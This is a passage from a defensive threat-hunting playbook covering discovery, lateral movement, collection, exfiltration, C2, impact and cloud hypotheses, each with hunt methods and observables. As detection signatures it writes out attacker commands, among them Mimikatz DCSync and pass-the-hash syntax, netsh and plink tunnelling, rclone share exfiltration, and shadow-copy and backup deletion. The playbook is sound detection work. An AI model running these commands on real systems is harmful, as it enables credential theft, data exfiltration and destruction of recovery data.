Hunt Method: Alert on Event ID 4662 where Object Type contains DS-Replication-Get-Changes-All or DS-Replication-Get-Changes-In-Filtered-Set and the subject is not a known Domain Controller computer account. Correlate with network connections: DCSync requires a connection from the attacking machine to DC port 445 using the MS-DRSR protocol. Any non-DC workstation initiating MS-DRSR replication is a near-certain compromise indicator.

Key Observables:

• Event ID 4662 with 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All)
• Replication request sourced from workstation IP, not known DC IP
• Mimikatz lsadump::dcsync /domain:[domain] /user:krbtgt patterns
• Impacket secretsdump.py network signatures on port 445
• Sudden replication traffic to DC from non-DC endpoint

False Positive Sources: Azure AD Connect sync server (document its IP); legitimate additional DCs; authorized ADMT migration tools.

TA0007 — Discovery¶

HYP-027 — Active Directory Enumeration (BloodHound / SharpHound)¶

Hypothesis: A threat actor may be running BloodHound/SharpHound to enumerate Active Directory objects and identify attack paths to Domain Admin which would be observable in network traffic and DC LDAP logs as large-volume LDAP queries against the domain controller enumerating users, groups, computers, ACLs, and GPOs in rapid succession.

Data Sources:

• Domain Controller LDAP logs (Directory Service Access Event ID 1644 for expensive queries)
• Network flow data (LDAP port 389/636 traffic volume from workstations)
• Network IDS signatures (SharpHound query patterns)
• Sysmon DNS query logs (LDAP SRV record lookups)

Hunt Method: Enable Event ID 1644 logging (expensive, inefficient, or long-running LDAP queries) on DCs. Alert on any workstation that generates more than 200 LDAP queries to the DC within a 5-minute window. SharpHound has characteristic LDAP query patterns (querying msds-allowedtodelegateto, ms-mcs-admpwd, all group memberships in sequence). Deploy Canary accounts with no legitimate use in ACLs — any query resolving their SID is anomalous.

Key Observables:

• Single workstation: 500+ LDAP queries in 60 seconds to DC
• Queries for all samAccountType=805306368 (all users) in sequence
• LDAP queries for msds-allowedtodelegateto (delegation enumeration)
• Query for all objectClass=groupPolicyContainer (GPO enumeration)
• BloodHound JSON output files created on endpoint ([timestamp]_computers.json, _users.json, etc.)
• SharpHound.exe or SharpHound.ps1 process creation (or renamed variant — check hash)

False Positive Sources: Legitimate AD management tools (Microsoft RSAT, Quest tools) that perform bulk queries; identity governance products (SailPoint, Saviynt); AD health check scripts run by IT.

HYP-028 — Internal Network Scanning¶

Hypothesis: A threat actor who has gained a foothold may be scanning the internal network to discover additional hosts and services which would be observable in network flow data and IDS logs as a single internal host generating connection attempts across many destination IPs and ports within a short timeframe.

Data Sources:

• Network flow records (NetFlow, IPFIX, sFlow)
• Network IDS/IPS logs
• Firewall deny logs (internal segments)
• Endpoint network connection telemetry (Sysmon Event ID 3)

Hunt Method: Baseline internal east-west traffic patterns. Alert on any single internal host connecting to more than 20 unique destination IPs within a 5-minute window, or attempting connections to 10+ unique ports on a single destination. Detect Nmap, Masscan, and Nessus signatures. Also hunt for ICMP sweeps: a host sending ICMP echo to a /24 subnet range within seconds is a ping sweep.

Key Observables:

• Single source IP: >50 TCP SYN packets to different destinations within 60 seconds
• TCP connections to common service ports (22, 23, 80, 443, 445, 3389, 5985) across /16 range
• nmap.exe, masscan.exe, or network scanner process creation on endpoint
• ICMP echo to sequential IP addresses (.1 through .254)
• Large number of TCP RST or ICMP unreachable responses received by scanning host

False Positive Sources: Authorized vulnerability scanners (Nessus, Qualys, Rapid7 — document their IPs); IT asset inventory tools; monitoring agents during initial deployment.

HYP-029 — Local Account and Group Enumeration¶

Hypothesis: A threat actor may be enumerating local accounts, groups, and admin memberships on a compromised endpoint as part of privilege escalation reconnaissance which would be observable in process creation logs as enumeration commands executed shortly after initial compromise.

Data Sources:

• Process creation logs (Sysmon Event ID 1 / Event ID 4688)
• PowerShell ScriptBlock logs
• Windows Security Event ID 4798 (User's local group membership enumerated)
• Windows Security Event ID 4799 (Security-enabled local group membership enumerated)

Hunt Method: Build a query for rapid enumeration command sequences: net user, net localgroup, whoami /groups, net group "Domain Admins" /domain executed within a short window from a single non-admin process context. The key signal is sequential execution of multiple discovery commands from the same parent process (command grouping). A single whoami from a user is normal; five discovery commands in 30 seconds from cmd.exe is a post-exploitation pattern.

Key Observables:

• net user /domain → net group "Domain Admins" /domain → net localgroup administrators in sequence
• whoami /all (full privilege and group dump) from unexpected context
• Get-LocalGroupMember -Group Administrators in PowerShell session
• Event ID 4798/4799 fired many times within seconds from single account
• All enumeration from same CMD or PowerShell session (same parent PID)

False Positive Sources: IT helpdesk scripts that gather account info for troubleshooting; onboarding scripts; IAM tools performing access reviews.

TA0008 — Lateral Movement¶

HYP-030 — Pass-the-Hash (PtH) Lateral Movement¶

Hypothesis: A threat actor may be using captured NTLM password hashes to authenticate to other systems without knowing the plaintext password which would be observable in Windows Security logs as network logon events using NTLM authentication from workstations with source process other than legitimate user-driven access.

Data Sources:

• Windows Security Event ID 4624 (Logon Type 3 — Network, NTLM)
• Windows Security Event ID 4625 (Failed network logon)
• Network traffic analysis (NTLM challenge-response on port 445)
• EDR lateral movement detection

Hunt Method: Filter for Event ID 4624 Logon Type 3 with Authentication Package: NTLM from source workstations (not servers). Flag logons where the source IP does not match any known location for that user account. Detect impossible logons: same account authenticated from two different IP addresses simultaneously using NTLM (same hash being replayed). Alert on admin account NTLM logons to workstations from other workstations (workstation-to-workstation lateral movement pattern).

Key Observables:

• Admin account NTLM network logon from workstation IP to another workstation
• Same account: NTLM logon from two different IPs within seconds
• NTLM logon to ADMIN$ or C$ share from non-domain-controller source
• Mimikatz sekurlsa::pth indicator in process or command-line logs
• Event ID 4624 with Elevated Token: Yes over NTLM network logon

False Positive Sources: Legacy applications using NTLM; some monitoring tools authenticating with service accounts; IT management tools accessing systems via UNC paths.

HYP-031 — PsExec-Style Remote Execution¶

Hypothesis: A threat actor may be using PsExec or similar tools to execute commands on remote systems by creating a service on the target which would be observable in Windows Event Logs as remote service creation events and named pipe activity associated with PsExec's PSEXESVC service.

Data Sources:

• Windows System Event ID 7045 (Service installed)
• Windows Security Event ID 4697 (Service installed in the system)
• Named pipe creation (Sysmon Event ID 17/18)
• Network traffic on port 445 (SMB)

Hunt Method: Alert on Event ID 7045 where the service name is PSEXESVC or matches a regex for random-name PsExec variants. Hunt for services with ImagePath pointing to executables in Admin$ or C$ shares on the service host. Detect the PsExec named pipe: \PSEXESVC or \pipe\[randomname] created by services.exe. Any service created with a binary path resolving to %TEMP% or %SYSTEMROOT%\PSEXESVC.exe is high-fidelity.

Key Observables:

• Event ID 7045: Service name PSEXESVC or random 8-char name
• Service binary path: %SYSTEMROOT%\PSEXESVC.exe or C:\Windows\[random].exe
• Named pipe: \\.\pipe\PSEXESVC created by services.exe
• SMB connection to ADMIN$ share immediately before service creation
• Service created and deleted within seconds (short-lived execution pattern)

False Positive Sources: Legitimate PsExec use by IT administrators (which should be documented); some monitoring products use PsExec internally; vulnerability scanners.

HYP-032 — WinRM / PowerShell Remoting Lateral Movement¶

Hypothesis: A threat actor may be using WinRM (Windows Remote Management) for lateral movement as it generates less noise than PsExec and is often enabled by default on servers which would be observable in network logs and Windows Event Logs as WinRM connections from user workstations to non-standard targets, especially during non-business hours.

Data Sources:

• Windows-Remote-Management/Operational Event Log (Event ID 6 — remote connection)
• Network flow data (WinRM ports 5985/HTTP, 5986/HTTPS)
• Windows Security Event ID 4624 (Logon Type 3 — Network)
• PowerShell ScriptBlock logs on target (remote sessions logged)

Hunt Method: Baseline legitimate WinRM connections (authorized management hosts, IT admin workstations). Alert on WinRM connections from user workstations to other workstations or servers that are not on the baseline. Focus on after-hours activity. Detect Enter-PSSession, Invoke-Command, and New-PSSession cmdlets in ScriptBlock logs on source machines targeting non-standard destinations.

Key Observables:

• WinRM Event ID 6 (connection initiated) from workstation to workstation
• powershell.exe making outbound TCP connection to port 5985/5986
• wsmprovhost.exe spawning child processes on the target (remote execution)
• Invoke-Command -ComputerName [target] -ScriptBlock { [payload] } in ScriptBlock log
• WinRM connections outside 07:00-19:00 local time from user workstations

False Positive Sources: Authorized PowerShell remoting by system administrators; SCCM/Intune management using WinRM; some monitoring platforms.

HYP-033 — RDP Tunneling and Port Forwarding for Lateral Movement¶

Hypothesis: A threat actor may be establishing RDP tunnels through compromised hosts to access systems not directly reachable from their initial foothold which would be observable in network logs as RDP (port 3389) connections on non-standard ports, or as SSH/netsh-based port forwarding rules creating new listeners.

Data Sources:

• Network flow data (non-standard port RDP, SSH tunnel indicators)
• Windows Firewall logs (new inbound rules)
• Sysmon Event ID 3 (Network connection) on pivot hosts
• netsh.exe process creation logs

Hunt Method: Hunt for netsh interface portproxy commands that create new port forwarding rules. Alert on new Windows Firewall rules added via netsh advfirewall or PowerShell. Detect RDP over non-standard ports: any TCP connection that exhibits RDP protocol behavior (NLA handshake, T.128 protocol) on ports other than 3389. Identify plink.exe, chisel, ngrok, or sshuttle process creation.

Key Observables:

• netsh interface portproxy add v4tov4 listenport=[port] connectaddress=[target] connectport=3389
• New firewall inbound rule allowing non-standard port from any source
• plink.exe -L [local-port]:[target]:3389 [pivot-host] in process creation
• mstsc.exe connecting to 127.0.0.1:[non-standard port] (tunnel endpoint)
• chisel.exe, ngrok.exe, frp.exe process creation

False Positive Sources: Authorized VPN split tunneling; legitimate remote support tools; developer SSH tunneling for database access (document and baseline).

HYP-034 — SMB Relay Attack¶

Hypothesis: A threat actor may be performing SMB relay attacks by intercepting NTLM authentication and relaying credentials to other systems which would be observable in network traffic as NTLM authentication requests arriving at unexpected hosts, particularly following LLMNR or NBT-NS poisoning.

Data Sources:

• Network packet capture (LLMNR, NBT-NS, mDNS queries)
• Windows Security Event ID 4624 (unexpected NTLM network logon)
• Network IDS (Responder signatures)
• DNS query logs (failed resolution that triggers LLMNR fallback)

Hunt Method: Detect LLMNR responses arriving from IP addresses that do not own the requested hostname — this is the poisoning step. Hunt for sudden new NTLM authentication events where the authenticating host did not initiate the connection (relay indicator). Correlate NTLM logons with the originating DNS failure that triggered LLMNR. Deploy honeypot hostnames that generate LLMNR queries to detect poisoners.

Key Observables:

• LLMNR/NBT-NS response from non-authoritative host
• NTLM authentication from host X to host Y, where Y did not send a connection request to X
• Responder.py process or file creation indicators
• ntlmrelayx.py network patterns (relay connection pairs)
• Workstation authenticating to share that doesn't exist at time of auth

False Positive Sources: LLMNR is commonly used legitimately in environments where it's not disabled; some IT tools trigger LLMNR by querying non-existent hosts.

TA0009 — Collection¶

HYP-035 — Mass File Access Pre-Exfiltration Staging¶

Hypothesis: A threat actor may be staging data for exfiltration by accessing and copying large numbers of sensitive files across network shares which would be observable in file access audit logs as a single account accessing significantly more files than their normal baseline within a short period, particularly from file servers containing sensitive data.

Data Sources:

• Windows Security Event ID 4663 (File access — Object Access auditing required)
• File server access logs
• DLP solution alerts
• EDR file read telemetry (bulk read operations)

Hunt Method: Establish per-user and per-role file access baselines (7-day rolling average). Alert on any account exceeding 3 standard deviations above their baseline access count within a single 4-hour window. Focus on access to directories tagged as sensitive (HR, Finance, IP, Legal). Detect archive creation (rar.exe, 7z.exe, zip.exe) combined with large file reads immediately before or after.

Key Observables:

• Single account: 10,000+ file reads in 2 hours (anomalous for user role)
• Sequential file access across multiple directories (tree-walk pattern)
• Archive utility (7z.exe, rar.exe) creating large compressed file after bulk read
• File reads from shares the account has never accessed in 90-day baseline
• .zip or .rar created in %TEMP% or removable media path

False Positive Sources: Backup agents running under user context; bulk migration projects; developers accessing large codebases; legitimate data analytics running user context queries.

HYP-036 — Screen Capture and Keylogging¶

Hypothesis: A threat actor may be using screen capture or keylogging capabilities to harvest credentials and sensitive information which would be observable in EDR telemetry as processes invoking screen capture APIs (BitBlt, PrintWindow) or keyboard hooking APIs (SetWindowsHookEx with WH_KEYBOARD_LL) outside of legitimate applications.

Data Sources:

• EDR API call monitoring (user-mode hooks, WinAPI calls)
• Process creation logs (screen capture utilities)
• File creation events (screenshot files, keylog output files)
• Memory forensics

Hunt Method: Hunt for processes calling GetDC(NULL) (screen DC capture) from non-standard applications. Detect SetWindowsHookEx with hook type WH_KEYBOARD_LL (13) or WH_MOUSE_LL (14) from processes that are not input method editors or accessibility tools. Alert on processes creating large numbers of image files (.bmp, .png, .jpg) in rapid succession or writing to files named keylog, capture, screenshot in temp directories.

Key Observables:

• Non-UI process calling SetWindowsHookEx(WH_KEYBOARD_LL)
• Process creating sequential .bmp files in temp directory at regular intervals
• Process making PrintWindow API calls targeting all foreground windows in sequence
• Keystroke log file (.txt, .log) being written to by an unusual process
• Low-level mouse hook installed by background process

False Positive Sources: Remote desktop and remote support tools (legitimately capture screen); accessibility software (screen readers); legitimate screenshot utilities; virtual meeting software.

TA0010 — Exfiltration¶

HYP-037 — Cloud Sync Tool Exfiltration (Rclone / MEGAsync)¶

Hypothesis: A threat actor may be using legitimate cloud synchronization tools such as Rclone or MEGAsync to exfiltrate large volumes of data to attacker-controlled cloud storage which would be observable in process creation logs and network traffic as sync tool execution targeting internal file shares followed by large outbound data transfers to cloud storage endpoints.

Data Sources:

• Process creation logs (rclone.exe, MEGAsync.exe, or renamed variants)
• Network flow data (high-volume outbound to MEGA, Dropbox, OneDrive, B2 endpoints)
• DLP network inspection
• DNS queries for cloud storage provider APIs

Hunt Method: Alert on rclone.exe process creation — it has almost no legitimate business use in most organizations. Hunt for renamed rclone: check PE file metadata (FileDescription, ProductName fields) and file hashes against rclone releases. Detect large outbound data transfers (>1GB in 1 hour) to cloud storage provider IP ranges. Build a DNS blocklist for known exfil-used cloud services if business-unneeded.

Key Observables:

• rclone.exe copy \\[server]\[share] [remote]:[bucket] --transfers 8
• Large outbound transfer (bytes sent >> bytes received) to MEGA, Backblaze, Wasabi, S3
• rclone.exe executed from %TEMP%, %APPDATA%, or C:\Users\Public\
• MEGAsync with non-employee MEGA account (check account email in config)
• Outbound TCP connections to g.api.mega.co.nz from non-standard systems

False Positive Sources: Legitimate cloud backup tools; IT-approved Dropbox/OneDrive business sync; developer tools using S3 for CI/CD (document and baseline by host).

HYP-038 — DNS Tunneling for Data Exfiltration¶

Hypothesis: A threat actor may be using DNS tunneling to exfiltrate data through an organization's DNS resolvers while bypassing content filtering which would be observable in DNS query logs as a single host generating an unusually high volume of TXT or NULL record queries to a single parent domain with long, high-entropy subdomains.

Data Sources:

• Internal DNS resolver query logs
• Network packet capture (DNS traffic analysis)
• Firewall DNS inspection logs
• Zeek/Suricata DNS analysis

Hunt Method: Analyze DNS query logs for: high-entropy subdomain labels (>30 characters with high character diversity); high query volume to a single parent domain from a single host (>100 queries/hour to one domain); TXT and NULL record query types (unusual in normal browsing); and domains registered recently with no prior DNS history. Calculate subdomain entropy — legitimate CDN and analytics domains have predictable subdomains; tunneled data has high entropy.

Key Observables:

• TXT or NULL record queries to [base64encoded-data].[attacker-domain].com
• Single host: 1,000+ DNS queries per hour to domains registered < 30 days
• Subdomain length >40 characters with character entropy >3.5 bits
• Sequential subdomain increments (chunk index embedded in subdomain)
• DNS response with unusually large TXT records containing encoded data
• iodine, dnscat2, dns2tcp tool signatures

False Positive Sources: DKIM records (long TXT values); legitimate CDN providers with encoded URLs in subdomains; analytics beacons; some antivirus update mechanisms use TXT records.

HYP-039 — HTTPS Exfiltration to Newly Registered Domains¶

Hypothesis: A threat actor may be exfiltrating data over HTTPS to attacker-controlled infrastructure registered specifically for this campaign which would be observable in web proxy and TLS inspection logs as large outbound HTTPS transfers to low-reputation domains with certificates issued recently and no prior organizational access history.

Data Sources:

• Web proxy logs with bytes-transferred
• TLS certificate inspection logs (JA3/JA3S fingerprints)
• DNS query logs (first-seen domain tracking)
• Threat intelligence (domain age, WHOIS, VirusTotal)

Hunt Method: Flag any HTTPS connection where outbound bytes exceed 10MB to a domain seen for the first time in this organization, where the domain was registered within 90 days, or where the TLS certificate was issued within 14 days. Correlate with DLP alerts for file upload patterns. Calculate upload/download ratios — exfiltration sessions show high upload-to-download ratios (opposite of normal web browsing).

Key Observables:

• HTTPS POST with body size >10MB to domain age <30 days
• HTTP response content-length near zero, request body large (pure upload)
• TLS certificate with Let's Encrypt CA issued within 7 days of first contact
• Domain with no prior DNS resolution history in organization's resolver
• Outbound transfer occurring at 2-5 AM local time to unusual country TLD

False Positive Sources: Cloud backup services; SaaS uploads; developer code pushes to cloud repositories; legitimate CDN services frequently rotate domain infrastructure.

TA0011 — Command and Control¶

HYP-040 — Periodic HTTP/S Beaconing¶

Hypothesis: A threat actor's C2 implant may be beaconing to command infrastructure at regular intervals which would be observable in web proxy and firewall logs as a single internal host making periodic HTTP/S connections to the same external destination with consistent byte counts and inter-connection timing that follows a mathematical pattern.

Data Sources:

• Web proxy logs with timestamps and bytes transferred
• Firewall connection logs
• NetFlow data
• DNS query logs

Hunt Method: Perform beacon analysis on proxy logs: for each (source IP, destination domain) pair, calculate the standard deviation of inter-connection intervals over a 24-hour window. Beacons have low standard deviation (consistent timing); human browsing has high variance. Script this as: group connections by src+dst, compute time deltas between consecutive connections, flag pairs where StdDev < 10% of mean interval and connection count > 20 per day. Adjust for sleep jitter (beacons with ±10-20% jitter will show slightly higher StdDev but still low relative to human browsing).

Key Observables:

• StdDev of inter-connection times < 10% of mean for same (host, domain) pair
• Connections at consistent byte sizes (implant heartbeat with fixed-size check-in)
• Connections continuing through non-business hours (03:00-05:00) without human present
• FQDN resolving to single IP (dedicated C2 server vs. CDN with many IPs)
• User-Agent strings not matching any installed browser version on host

False Positive Sources: Software update checks (Windows Update, antivirus, application updaters) — these beacon but to known-good infrastructure. Browser "phone home" telemetry. NTP clients.

HYP-041 — Cobalt Strike Beacon Detection¶

Hypothesis: A threat actor may be using Cobalt Strike as their C2 framework which would be observable in network traffic, process memory, and DNS logs as characteristic Cobalt Strike malleable C2 profile patterns, default watermark values, or known beacon staging behaviors.

Data Sources:

• Network packet capture / TLS-inspected proxy logs
• Memory forensics (Volatility malfind / shellcode plugins)
• YARA scanning of process memory
• JA3/JA3S TLS fingerprint analysis
• DNS query logs

Hunt Method: Scan process memory for Cobalt Strike beacon patterns: \x4d\x5a PE header in non-module-backed memory regions; 0xBEEF XOR key patterns; shellcode stager signatures. In network traffic, hunt for: JARM fingerprints matching known CS Team Servers; HTTP responses with Set-Cookie headers containing short, high-entropy values (CS default profile); and DNS requests for long-TTL A records that immediately follow HTTP beacon timing. Scan CS config extraction for default watermark 0 (unregistered/cracked copy).

Key Observables:

• Reflective DLL injection: PE header in non-module-backed memory (Sysmon Event ID 8)
• CS JARM fingerprint: 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb and variants
• HTTP check-in: GET /[path] HTTP/1.1 with Cookie: [8-char-base64]= header
• DNS beacon: A record query for [random].[c2-domain].com every N seconds
• Named pipe: \pipe\MSSE-[random]-server (CS default pipe name)

False Positive Sources: Legitimate red team activity (authorized CS deployment); security researchers; some vendor tools built on CS-adjacent frameworks.

HYP-042 — C2 Over DNS¶

Hypothesis: A threat actor may be using DNS as a C2 channel to receive commands and exfiltrate small amounts of data through an organization's DNS resolver, bypassing web proxy controls which would be observable in DNS logs as a host making queries to a single domain at a rate inconsistent with legitimate browsing, with command responses embedded in TXT or CNAME records.

Data Sources:

• Internal DNS resolver logs
• DNS packet capture
• Network IDS (dnscat2, iodine signatures)
• Zeek DNS analyzer

Hunt Method: Hunt for internal hosts making DNS queries that do not terminate in browsing activity — a host that queries a domain but never establishes a TCP connection to the resolved IP is likely using DNS for C2 only. Detect command polling: regular interval DNS queries to same parent domain. Analyze response records: TXT records with encoded content, CNAME chains, or unusually high-TTL responses. dnscat2 and similar tools have known traffic signatures.

Key Observables:

• Host queries domain > 10 times/hour but never connects to resolved IP (DNS-only C2)
• TXT record response containing base64 or hex-encoded data
• CNAME chain depth > 3 hops for internal host resolution
• DNS query-only sessions with no corresponding TCP/UDP connection
• dnscat2 client signatures in process memory or ScriptBlock logs

False Positive Sources: SPF/DKIM record checks by mail gateways; some certificate transparency checks; DNS prefetch from browsers.

HYP-043 — ICMP C2 Tunneling¶

Hypothesis: A threat actor may be using ICMP echo requests/replies to tunnel C2 traffic through firewall policies that permit ICMP which would be observable in network traffic as ICMP packets with unusually large or inconsistent payloads, non-standard echo sequence numbers, or bidirectional ICMP flow to a single external IP at regular intervals.

Data Sources:

• Network packet capture (ICMP traffic analysis)
• Firewall allow logs for ICMP outbound
• Network IDS ICMP anomaly signatures
• NetFlow (ICMP flow analysis)

Hunt Method: Capture and analyze ICMP traffic. Normal ICMP echo has 32-byte payload (Windows default) or 56-byte (Linux default). Hunt for ICMP packets with variable, large (>256 bytes), or high-entropy payloads. Detect bidirectional ICMP-only flows (no associated TCP/UDP) between internal hosts and external IPs sustained over minutes. Tools: icmptunnel, ptunnel, icmp-c2 have characteristic sequence and checksum patterns.

Key Observables:

• ICMP echo with payload > 256 bytes
• High-entropy ICMP data field (random-looking bytes, not standard pattern)
• Regular ICMP exchanges to single external IP every 30-60 seconds
• ICMP sequence numbers incrementing in unusual patterns
• External host responding to ICMP with different payload length than request

False Positive Sources: Large ping tests by network administrators; PMTU discovery; some monitoring tools use non-standard ICMP payloads.

TA0040 — Impact¶

HYP-044 — Ransomware Pre-Encryption Preparation Chain¶

Hypothesis: A threat actor staging a ransomware attack may execute a preparation chain before encryption including shadow copy deletion, backup destruction, and defense disabling which would be observable in process creation and event logs as a sequence of living-off-the-land commands targeting recovery mechanisms within a short window.

Data Sources:

• Process creation logs (Sysmon Event ID 1 / Event ID 4688)
• VSS (Volume Shadow Copy) event logs
• Windows Backup event logs
• EDR behavioral detection

Hunt Method: Build a composite detection for the ransomware preparation chain. Each individual component may appear benign, but the combination within a short window (< 30 minutes) is high-fidelity: (1) vssadmin delete shadows, (2) bcdedit /set {default} recoveryenabled No, (3) wbadmin delete catalog -quiet, (4) net stop targeting backup services. Alert on any two of these occurring within 10 minutes from the same host.

Key Observables:

• vssadmin.exe delete shadows /all /quiet
• bcdedit.exe /set {default} recoveryenabled no
• wbadmin.exe delete catalog -quiet
• net stop "Backup Exec Agent" or similar backup service stops
• taskkill /f /im targeting database, backup, or AV process names
• cipher.exe /w:C:\ (wipe free space — used to prevent shadow recovery)
• Registry: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR = 1

False Positive Sources: Disk cleanup scripts that remove old shadow copies; authorized IT backup management; system administrators intentionally disabling recovery for reimaging.

HYP-045 — Disk Wiper Activity¶

Hypothesis: A threat actor deploying destructive malware (wiper) may be overwriting the Master Boot Record, partition table, or critical OS files to render systems unbootable which would be observable in EDR telemetry as direct raw disk writes, system file overwrites, or PE images matching known wiper families (WhisperGate, CaddyWiper, HermeticWiper).

Data Sources:

• EDR kernel-level disk write monitoring
• YARA signatures (wiper malware families)
• File deletion events (MFT record deletion en masse)
• Windows crash/BSOD events following wiper execution

Hunt Method: Deploy YARA rules for known wiper families (WhisperGate, CaddyWiper, HermeticWiper, Shamoon) on endpoint and email gateway. Monitor for processes writing to \\.\PhysicalDrive0 — legitimate processes virtually never do this. Detect mass file deletion events: >10,000 files deleted in 5 minutes from a single process. Correlate with geopolitical context — wipers are typically deployed in targeted campaigns against specific nations or industries.

Key Observables:

• Process writing to \\.\PhysicalDrive0 with non-SYSTEM context
• Mass file deletion: >10,000 DeleteFile calls in 60 seconds
• format.com or diskpart.exe invoked with clean command on system drive
• Known wiper hash matches (HermeticWiper, CaddyWiper, etc.)
• bootrec.exe /fixmbr followed by reboot (legitimate use but context-dependent)
• NTFS MFT zone overwrite (specific wiper technique)

False Positive Sources: Authorized disk sanitization tools (DBAN, sdelete); data center decommissioning workflows; disk reimaging processes.

HYP-046 — Backup Destruction and Anti-Recovery¶

Hypothesis: A threat actor may systematically destroy backup infrastructure before deploying ransomware to maximize impact and eliminate recovery options which would be observable in backup management logs and network traffic as unauthorized access to backup servers, deletion of backup jobs, or encryption of backup storage repositories.

Data Sources:

• Backup software logs (Veeam, Commvault, Backup Exec)
• Veeam REST API audit logs
• Network access logs to backup servers
• Authentication logs (backup server admin accounts)

Hunt Method: Enable audit logging on backup infrastructure. Alert on: any deletion of backup jobs or repositories outside change management windows; authentication to backup management console from non-backup-admin accounts; bulk deletion of recovery points; changes to immutability settings on backup repositories. Treat any backup server administrative action between 21:00-06:00 as requiring immediate review.

Key Observables:

• Veeam: Multiple backup jobs deleted within short window
• Veeam: Immutability disabled on backup repository
• Backup server: vss_writer or beremote.exe stopped
• Authentication to backup console from admin account not previously seen there
• Backup storage share accessed from compromised workstation
• CloudBackup API calls: S3 DeleteBucket or DeleteObject for backup buckets

False Positive Sources: Authorized backup administrator performing cleanup; scheduled backup pruning jobs; migration of backup infrastructure.

Cloud-Specific Hypotheses¶

HYP-047 — AWS/Azure IAM Enumeration¶

Hypothesis: A threat actor who has obtained cloud credentials may be enumerating IAM permissions and resources to understand their access level and identify privilege escalation opportunities which would be observable in CloudTrail or Azure Audit Logs as a series of List*, Get*, and Describe* API calls from a new IP, new user agent, or at unusual times.

Data Sources:

• AWS CloudTrail logs
• Azure Monitor / Activity Log
• GCP Cloud Audit Logs
• CSPM platform alerts

Hunt Method: In CloudTrail, query for IAM enumeration API calls: iam:ListUsers, iam:ListRoles, iam:ListPolicies, iam:GetAccountAuthorizationDetails (the most comprehensive single-call enumeration). Alert on GetAccountAuthorizationDetails from any source — this is the Pacu/ScoutSuite enumeration call. Detect iam:SimulateCustomPolicy (used to test permissions without executing actions). Flag any IAM API calls from new IP addresses or User-Agent strings not previously seen for that access key.

Key Observables:

• iam:GetAccountAuthorizationDetails — single call dumps all IAM data
• Sequential iam:List* calls from same access key within 5 minutes
• sts:GetCallerIdentity as first action (attacker checking "who am I")
• Access from Tor exit nodes, VPN providers, or cloud hosting IPs
• API calls from User-Agent python-requests, Boto3, aws-cli from unusual geographic location
• ScoutSuite, Pacu, CloudMapper characteristic API call sequences

False Positive Sources: Cloud security posture management tools (Prisma, Wiz, Orca) perform IAM enumeration legitimately — document their source IPs and credentials; authorized penetration test activity.

HYP-048 — S3 Data Exfiltration¶

Hypothesis: A threat actor who has obtained S3 read permissions may be exfiltrating sensitive data from S3 buckets which would be observable in S3 access logs as a large number of GetObject calls from an unauthorized identity, unusual IP, or outside of normal access patterns.

Data Sources:

• S3 Server Access Logs
• AWS CloudTrail (S3 data events — must be explicitly enabled)
• AWS Macie findings
• VPC Flow Logs

Hunt Method: Enable S3 data event logging in CloudTrail for sensitive buckets. Alert on: GetObject calls from IPs not in corporate IP ranges for sensitive buckets; ListObjects + bulk GetObject combination (enumeration followed by download); and any GetObject calls at rates exceeding the user's or role's historical baseline by 10x. AWS Macie continuously analyzes S3 for sensitive data and unusual access — integrate Macie findings with your SIEM.

Key Observables:

• S3 access logs: >1,000 GetObject requests in 1 hour from single IP
• aws s3 sync s3://[bucket] . command signature in CloudTrail
• Access from IP address with no prior access to this bucket (ever)
• Bucket access using credentials from a compute instance not expected to access storage
• GetObject calls for files containing PII patterns matched by Macie
• Public access enabled on previously private bucket (PutBucketAcl public)

False Positive Sources: Legitimate data processing pipelines; ETL jobs; CDN origin pulls; authorized data analytics workflows.

HYP-049 — Lambda / Cloud Function Persistence¶

Hypothesis: A threat actor may be creating or modifying serverless functions to establish persistent access to cloud infrastructure which would be observable in cloud audit logs as unauthorized Lambda function creation, existing function code modification, or new function triggers configured by credentials not authorized for that operation.

Data Sources:

• AWS CloudTrail (Lambda management events)
• AWS Config (Lambda function configuration changes)
• Azure Function App audit logs
• Git history for IaC repositories

Hunt Method: Alert on lambda:CreateFunction, lambda:UpdateFunctionCode, and lambda:AddPermission API calls from identities that are not part of the authorized CI/CD pipeline. Detect Lambda functions created with execution roles exceeding least-privilege (IAM role with * actions). Hunt for new event source mappings added to existing functions — a common backdoor technique that causes the function to execute on attacker-controlled S3 writes or SQS messages.

Key Observables:

• lambda:CreateFunction by user identity not in authorized developers group
• Lambda function with iam:PassRole using AdministratorAccess execution role
• New EventSourceMapping added to existing sensitive function
• Lambda function code updated outside of CI/CD pipeline hours
• New function trigger: API Gateway route added without change management ticket
• Lambda environment variables containing new credentials or C2 URLs

False Positive Sources: Developer self-service in environments with loose IAM; CI/CD pipeline running with overly broad permissions; serverless framework deployment tools.

HYP-050 — Azure AD / Entra ID Lateral Movement via Conditional Access Bypass¶

Hypothesis: A threat actor with access to a cloud identity may be bypassing Conditional Access policies by using legacy authentication protocols or manipulating device compliance states which would be observable in Entra ID sign-in logs as successful authentications using legacy protocols where modern auth should be enforced, or from non-compliant devices.

Data Sources:

• Entra ID Sign-in Logs (Azure Monitor)
• Entra ID Audit Logs
• Microsoft 365 Unified Audit Log
• Conditional Access policy evaluation results in sign-in logs

Hunt Method: Query sign-in logs for successful authentications where clientAppUsed is a legacy protocol: Exchange ActiveSync, IMAP, POP3, SMTP Auth, Basic Auth. These bypass many Conditional Access policies. Alert on successful legacy auth logons for accounts that have modern auth enabled (indicating deliberate protocol downgrade). Hunt for device registration events from non-corporate IP addresses — attackers register managed devices to gain compliance status.

Key Observables:

• Sign-in log: clientAppUsed = "Other clients" or "IMAP" for accounts with MFA enabled
• Successful authentication with conditionalAccessStatus = "notApplied" unexpectedly
• New device registration followed immediately by application access from same IP
• Device: Compliant = True for device registered < 1 hour ago from unusual location
• Service principal added to privileged Azure AD role outside working hours

False Positive Sources: Legacy mail clients in regulated industries; specific line-of-business applications requiring basic auth; shared device kiosks.

HYP-051 — Azure AD Application and Service Principal Abuse¶

Hypothesis: A threat actor may be creating malicious OAuth applications or abusing service principals to maintain persistent access to Microsoft 365 and Azure resources even after user password resets which would be observable in Entra ID audit logs as new application registrations, consent grants, or service principal credential additions by non-IT accounts.

Data Sources:

• Entra ID Audit Logs
• Microsoft 365 Unified Audit Log
• Azure Activity Log
• OAuth token telemetry

